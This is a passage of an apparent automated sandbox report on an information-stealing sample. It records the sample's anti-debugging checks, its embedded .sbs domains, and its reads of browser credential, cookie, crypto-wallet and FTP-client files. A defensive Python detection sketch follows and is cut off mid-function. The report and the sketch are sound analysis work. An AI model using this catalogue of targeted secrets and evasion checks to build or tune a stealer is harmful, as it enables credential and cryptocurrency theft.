            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696501413
            Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
            Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

            Anti Debugging

            Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
            Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
            Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
            Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
            Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
            Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exe File opened: NTICE
            Source: C:\Users\user\Desktop\file.exe File opened: SICE
            Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
            Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0036E470 LdrInitializeThunk, 0_2_0036E470

            HIPS / PFW / Operating System Protection Evasion

            Source: file.exe String found in binary or memory: p3ar11fter.sbs
            Source: file.exe String found in binary or memory: 3xp3cts1aim.sbs
            Source: file.exe String found in binary or memory: peepburry828.sbs
            Source: file.exe String found in binary or memory: p10tgrace.sbs
            Source: file.exe String found in binary or memory: processhol.sbs
            Source: file.exe Binary or memory string: E4Program Manager
            Source: file.exe, 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: E4Program Manager
            Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: file.exe PID: 7748, type: MEMORYSTR
            Source: Yara match File source: sslproxydump.pcap, type: PCAP
            Source: file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
            Source: file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
            Source: file.exe String found in binary or memory: Jaxx Liberty
            Source: file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
            Source: file.exe, 00000000.00000003.1446094344.0000000000F56000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
            Source: file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
            Source: file.exe, 00000000.00000003.1446094344.0000000000F56000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: file.exe, 00000000.00000003.1446094344.0000000000F56000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.json
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.db
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7748, type: MEMORYSTR
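The list above is, in effect, a catalogue of where a stealer looks: Chromium Login Data, Network\Cookies, Web Data and History; Chrome Local/Sync Extension Settings directories keyed by wallet-extension IDs; Firefox logins.json, key4.db, cert9.db, cookies.sqlite and formhistory.sqlite; desktop wallets; FTP client configuration. The detection sketch below is an added example written for this page, not Joe Sandbox code and not the sample's code. It turns that catalogue into regexes and flags any process other than the owning browser that reads those stores, escalating when one process sweeps several store families, which is the pattern a stealer shows and a backup or sync tool does not. The owner-process names (chrome.exe, msedge.exe, firefox.exe), the event shape (pid, image, path) and the sample telemetry are assumptions constructed for the illustration; the paths mirror the "File opened" entries above.

```python
"""Flag processes that read credential stores they do not own (added example)."""
import re

# Processes allowed to read their own profile data. Assumption for this example.
CHROMIUM_OWNERS = frozenset({"chrome.exe", "msedge.exe"})
FIREFOX_OWNERS = frozenset({"firefox.exe"})
# Wallet and FTP-client stores deliberately have no owner list: every reader is
# reported, and the allow-list is tuned per environment.
NO_OWNERS = frozenset()

# (family, regex over the lower-cased backslash path, legitimate owner processes)
STORES = [
    ("chromium_credentials",
     re.compile(r"\\user data\\[^\\]+\\login data( for account)?$"), CHROMIUM_OWNERS),
    ("chromium_cookies",
     re.compile(r"\\user data\\[^\\]+\\network\\cookies$"), CHROMIUM_OWNERS),
    ("chromium_autofill_history",
     re.compile(r"\\user data\\[^\\]+\\(web data|history)$"), CHROMIUM_OWNERS),
    # Chrome extension IDs are 32 letters in the range a-p; wallet extensions keep
    # their state under (Local|Sync) Extension Settings\<id>.
    ("browser_extension_storage",
     re.compile(r"\\user data\\[^\\]+\\(local|sync) extension settings\\[a-p]{32}$"),
     CHROMIUM_OWNERS),
    ("firefox_credentials",
     re.compile(r"\\mozilla\\firefox\\profiles\\[^\\]+\\(logins\.json|key4\.db|cert9\.db)$"),
     FIREFOX_OWNERS),
    ("firefox_cookies_forms",
     re.compile(r"\\mozilla\\firefox\\profiles\\[^\\]+\\(cookies|formhistory)\.sqlite$"),
     FIREFOX_OWNERS),
    ("crypto_wallet",
     re.compile(r"\\(exodus\\exodus\.wallet|electrum(-ltc)?\\wallets|ledger live|"
                r"atomic\\local storage\\leveldb|coinomi\\coinomi\\wallets|bitcoin\\wallets|"
                r"binance|com\.liberty\.jaxx\\indexeddb|guarda\\indexeddb)$"), NO_OWNERS),
    ("ftp_client_config",
     re.compile(r"\\(ftpinfo|ftprush|smartftp\\client 2\.0\\favorites|ftpbox|ftpgetter|"
                r"sitedesigner\\3d-ftp)$"), NO_OWNERS),
]


def normalize(path):
    """Lower-case, backslash-only, no trailing separator."""
    return path.replace("/", "\\").rstrip("\\").lower()


def classify(path):
    """Return (family, owners) if path is a known sensitive store, else None."""
    p = normalize(path)
    for family, pattern, owners in STORES:
        if pattern.search(p):
            return family, owners
    return None


def analyze(events, fanout_threshold=3):
    """Group non-owner reads of sensitive stores per process.

    events: iterable of {'pid', 'image', 'path'} file-read records (constructed shape).
    Returns {pid: {'image', 'families', 'paths', 'severity'}}. A process touching
    fanout_threshold or more distinct families is 'high'; fewer is 'medium'.
    """
    findings = {}
    for ev in events:
        hit = classify(ev["path"])
        if hit is None:
            continue
        family, owners = hit
        image = normalize(ev["image"]).rsplit("\\", 1)[-1]
        if image in owners:
            continue  # the browser reading its own profile is expected
        rec = findings.setdefault(ev["pid"], {"image": image, "families": set(), "paths": []})
        rec["families"].add(family)
        rec["paths"].append(ev["path"])
    for rec in findings.values():
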